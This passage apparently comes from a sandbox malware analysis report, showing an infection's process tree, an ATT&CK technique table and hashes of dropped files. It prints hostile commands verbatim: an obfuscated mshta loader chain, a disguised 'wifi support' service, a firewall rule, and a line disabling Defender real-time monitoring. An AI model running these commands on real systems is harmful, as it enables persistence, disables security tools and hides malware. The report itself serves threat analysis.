                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\WWDZuXppnKPjP1R7.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\WWDZuXppnKPjP1R7.exe
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3904
                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:6284
                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5216
                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5864
                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                              PID:6280
                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:4124
                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                1⤵
                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                PID:4252
                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1472
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\97BB.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\97BB.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                  PID:6072
                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                  PID:5988
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\99EE.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\99EE.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:6480
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-5ESEA.tmp\99EE.tmp
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-5ESEA.tmp\99EE.tmp" /SL5="$A0454,172303,88576,C:\Users\Admin\AppData\Local\Temp\99EE.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      PID:1272
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-ITCHM.tmp\èeèrgegdè_éçè_)))_.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-ITCHM.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=rec7
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                        PID:5200
                                                                                                                                                                        • C:\Program Files\7-Zip\SEDTFDKHSR\irecord.exe
                                                                                                                                                                          "C:\Program Files\7-Zip\SEDTFDKHSR\irecord.exe" /VERYSILENT
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:6420
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-VF360.tmp\irecord.tmp
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-VF360.tmp\irecord.tmp" /SL5="$50522,5808768,66560,C:\Program Files\7-Zip\SEDTFDKHSR\irecord.exe" /VERYSILENT
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                              PID:6792
                                                                                                                                                                              • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                                                                "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                PID:6736
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a5-884af-252-6d699-f343cf4734ff3\Jodaeqekupa.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a5-884af-252-6d699-f343cf4734ff3\Jodaeqekupa.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            PID:5172
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\83-3c6aa-f79-14c9c-5ea8df3fc8c7c\Kaeraesonahy.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\83-3c6aa-f79-14c9c-5ea8df3fc8c7c\Kaeraesonahy.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                            PID:5680
                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5552
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A317.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\A317.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:6724
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A317.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\A317.exe"
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                            PID:4028
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6724 -s 784
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:4348
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\A49F.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\A49F.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                          PID:6720
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\aashaacq\
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4316
                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4172
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qiqfnlpn.exe" C:\Windows\SysWOW64\aashaacq\
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4664
                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                  "C:\Windows\System32\sc.exe" create aashaacq binPath= "C:\Windows\SysWOW64\aashaacq\qiqfnlpn.exe /d\"C:\Users\Admin\AppData\Local\Temp\A49F.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2888
                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                    "C:\Windows\System32\sc.exe" description aashaacq "wifi internet conection"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:6240
                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                      "C:\Windows\System32\sc.exe" start aashaacq
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:5660
                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4792
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A905.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\A905.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        PID:4584
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im A905.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\A905.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:4508
                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              PID:896
                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                              taskkill /im A905.exe /f
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              PID:6248
                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                              PID:2172
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ABC5.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ABC5.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4984
                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VbsCriPt: cLose ( cReatEOBjecT ( "WsCRipT.SHeLl"). Run("CMd.EXe /C Type ""C:\Users\Admin\AppData\Local\Temp\ABC5.exe"" > ..\8EqO3YYWQYIWQCG.ExE&& sTaRt ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7 & If """" == """" for %D in ( ""C:\Users\Admin\AppData\Local\Temp\ABC5.exe"" ) do taskkill -Im ""%~NXD"" /F " ,0 , TrUE ) )
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:5500
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\ABC5.exe" > ..\8EqO3YYWQYIWQCG.ExE&& sTaRt ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7 & If "" == "" for %D in ( "C:\Users\Admin\AppData\Local\Temp\ABC5.exe" ) do taskkill -Im "%~NXD" /F
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4604
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE
                                                                                                                                                                                                      ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:6312
                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbsCriPt: cLose ( cReatEOBjecT ( "WsCRipT.SHeLl"). Run("CMd.EXe /C Type ""C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE"" > ..\8EqO3YYWQYIWQCG.ExE&& sTaRt ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7 & If ""-p0Bd6WU~zT21V9yySfmmv7 "" == """" for %D in ( ""C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE"" ) do taskkill -Im ""%~NXD"" /F " ,0 , TrUE ) )
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:4980
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE" > ..\8EqO3YYWQYIWQCG.ExE&& sTaRt ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7 & If "-p0Bd6WU~zT21V9yySfmmv7 " == "" for %D in ( "C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE" ) do taskkill -Im "%~NXD" /F
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:5764
                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbSCrIPT: CLOSE( creAteOBJecT ( "WsCRIpT.ShElL"). RUn ( "C:\Windows\system32\cmd.exe /Q /c eCHo C:\Users\Admin\AppData\Local\TempcSpD> 10Ou8q.9 & ecHO | sET /p = ""MZ"" > 2AQ5.X& COpY /y /b 2Aq5.X + WwZoqDR.Aq_ + 3cQ7SE1.PD + 8jTXBDPR.VQ0 + BhxNJ8.m5W + 10OU8q.9 ..\fLNDPPCP.UUv & DEl /Q *& StArT regsvr32.exe ..\fLNDPPcp.UUv /s " , 0 , TRuE))
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:6000
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /Q /c eCHo C:\Users\Admin\AppData\Local\TempcSpD> 10Ou8q.9 & ecHO | sET /p = "MZ" >2AQ5.X& COpY /y /b 2Aq5.X + WwZoqDR.Aq_ + 3cQ7SE1.PD + 8jTXBDPR.VQ0 + BhxNJ8.m5W + 10OU8q.9 ..\fLNDPPCP.UUv & DEl /Q *& StArT regsvr32.exe ..\fLNDPPcp.UUv /s
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:5340
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" ecHO "
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:6096
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>2AQ5.X"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                          PID:5900
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                          regsvr32.exe ..\fLNDPPcp.UUv /s
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                                                                          PID:2096
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                    taskkill -Im "ABC5.exe" /F
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                    PID:4784
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\AEA4.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\AEA4.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5852
                                                                                                                                                                                                              • C:\Windows\SysWOW64\aashaacq\qiqfnlpn.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\aashaacq\qiqfnlpn.exe /d"C:\Users\Admin\AppData\Local\Temp\A49F.exe"
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                PID:5020
                                                                                                                                                                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                  svchost.exe
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                  PID:5852
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                PID:5772
                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                PID:2188
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                PID:4788
                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                PID:4496
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:5952
                                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 5952 -s 1460
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                    PID:5148
                                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 5952 -s 3140
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                    PID:6016
                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:4720
                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k wsappx -s ClipSVC
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4664
                                                                                                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:4980
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:1492

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                        2
                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                        New Service

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1050

                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                        2
                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                        New Service

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1050

                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                        5
                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                                        2
                                                                                                                                                                                                                        T1089

                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                        File Permissions Modification

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1222

                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                                        4
                                                                                                                                                                                                                        T1081

                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                        7
                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                        7
                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1120

                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                        4
                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08303804\libcurl.dll
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08303804\libcurlpp.dll
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08303804\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08303804\libstdc++-6.dll
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08303804\libwinpthread-1.dll
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08303804\setup_install.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          4e3569d940ba5408e2107b39d6961931

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          72b24793b343e2c7049b9c8a3e6c2b61e3c9612f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          8d57621ff03711e523a65bdddaf041d112989a214e7e0fdb04d563329a7f4b89

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          c2ed109b4732092dbef2ba693405cf5a33805ad5050ab3ca0cb651566dee6b8f6f7b82c3150b5afc0512418476ba7239a5f9085c4fcc5fe81abec592c42d6689

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08303804\setup_install.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          4e3569d940ba5408e2107b39d6961931

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          72b24793b343e2c7049b9c8a3e6c2b61e3c9612f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          8d57621ff03711e523a65bdddaf041d112989a214e7e0fdb04d563329a7f4b89

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          c2ed109b4732092dbef2ba693405cf5a33805ad5050ab3ca0cb651566dee6b8f6f7b82c3150b5afc0512418476ba7239a5f9085c4fcc5fe81abec592c42d6689

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_1.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          6e487aa1b2d2b9ef05073c11572925f2

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          b2b58a554b75029cd8bdf5ffd012611b1bfe430b

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_1.txt
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          6e487aa1b2d2b9ef05073c11572925f2

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          b2b58a554b75029cd8bdf5ffd012611b1bfe430b

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_10.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          881241cb894d3b6c528302edc4f41fa4

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          d92c0e9e50ce50d725a6d1bdbdebf7acfc2e5c6a

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          3e70e230daee66f33db3fdba03d3b7a9832088fe88b0b4435d719e185ae8a330

                                                                                                                                                                                                                          SHA512

